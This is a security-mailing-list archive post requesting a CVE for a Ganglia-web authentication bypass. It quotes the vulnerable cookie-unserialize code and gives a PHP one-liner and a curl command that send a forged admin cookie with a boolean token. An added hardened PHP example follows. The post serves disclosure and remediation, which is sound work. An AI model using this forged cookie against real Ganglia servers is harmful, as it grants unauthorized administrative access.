oss-sec mailing list archives
CVE request: Ganglia-web auth bypass
From: Ivan Novikov <in () wallarm com>
Date: Fri, 04 Sep 2015 20:34:39 +0300
Reported by GitHub: https://github.com/ganglia/ganglia-web/issues/267

It's easy to bypass auth by using boolean serialization like this:

$ php -r "echo urlencode(serialize(array('user'=>'admin', 'group'=>'admin', 'token'=>true)));"

Vulnerable code listed below:
https://github.com/ganglia/ganglia-web/blob/4e98ea69e0e18b388cdc73809ce54843a16ff87b/lib/GangliaAuth.php#L34-L46

    if(isSet($_COOKIE['ganglia_auth'])) {
      $cookie = $_COOKIE['ganglia_auth'];
      // magic quotes will break unserialization
      if($this->getMagicQuotesGpc()) {
        $cookie = stripslashes($cookie);
      }
      $data = unserialize($cookie);
      if(array_keys($data) != array('user','group','token')) {
        return false;
      }
      if($this->getAuthToken($data['user']) == $data['token']) {

// Found by d90.andrew
// Exploit: curl -H 'Cookie: a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22group%22%3Bs%3A5%3A%22admin%22%3Bs%3A5%3A%22token%22%3Bb%3A1%3B%7D' http://ganglia.local/ganglia/
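Added example, not part of the original message and not Ganglia's code: the loose `==` check from the report next to one possible hardened form (JSON cookie, string-only fields, hash_equals()). The loose check accepts the boolean token and the strict check rejects it. expectedToken() is a hypothetical stand-in for getAuthToken(), and SECRET and the JSON cookie format are assumptions made for the example.

```php
<?php
// Added example; expectedToken() and SECRET are constructed stand-ins.
const SECRET = 'constructed-demo-secret';

function expectedToken(string $user): string {
    return hash_hmac('sha256', $user, SECRET);
}

// Same shape as the check quoted in the report: unserialize() plus loose ==.
function checkLoose(string $cookie): bool {
    $data = unserialize($cookie);
    if (!is_array($data) || array_keys($data) != ['user', 'group', 'token']) {
        return false;
    }
    // Comparing a string with a boolean casts the string to bool first,
    // so any non-empty token string (other than "0") equals true.
    return expectedToken($data['user']) == $data['token'];
}

// Hardened: JSON cannot carry PHP objects, every field must be a string,
// and the token is compared byte-for-byte in constant time.
function checkStrict(string $cookie): bool {
    $data = json_decode($cookie, true);
    if (!is_array($data) || array_keys($data) !== ['user', 'group', 'token']) {
        return false;
    }
    foreach ($data as $value) {
        if (!is_string($value)) {
            return false;
        }
    }
    return hash_equals(expectedToken($data['user']), $data['token']);
}

$fields = ['user' => 'admin', 'group' => 'admin'];
$valid  = $fields + ['token' => expectedToken('admin')];
$forged = $fields + ['token' => true];   // boolean token, as in the report

echo 'loose,  boolean token: ';
var_dump(checkLoose(serialize($forged)));
echo 'strict, boolean token: ';
var_dump(checkStrict(json_encode($forged)));
echo 'strict, valid token:   ';
var_dump(checkStrict(json_encode($valid)));
```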
Current thread:
- CVE request: Ganglia-web auth bypass Ivan Novikov (Sep 04)
- Re: CVE request: Ganglia-web auth bypass cve-assign (Sep 05)
- Re: CVE request: Ganglia-web auth bypass Raphael Geissert (Sep 07)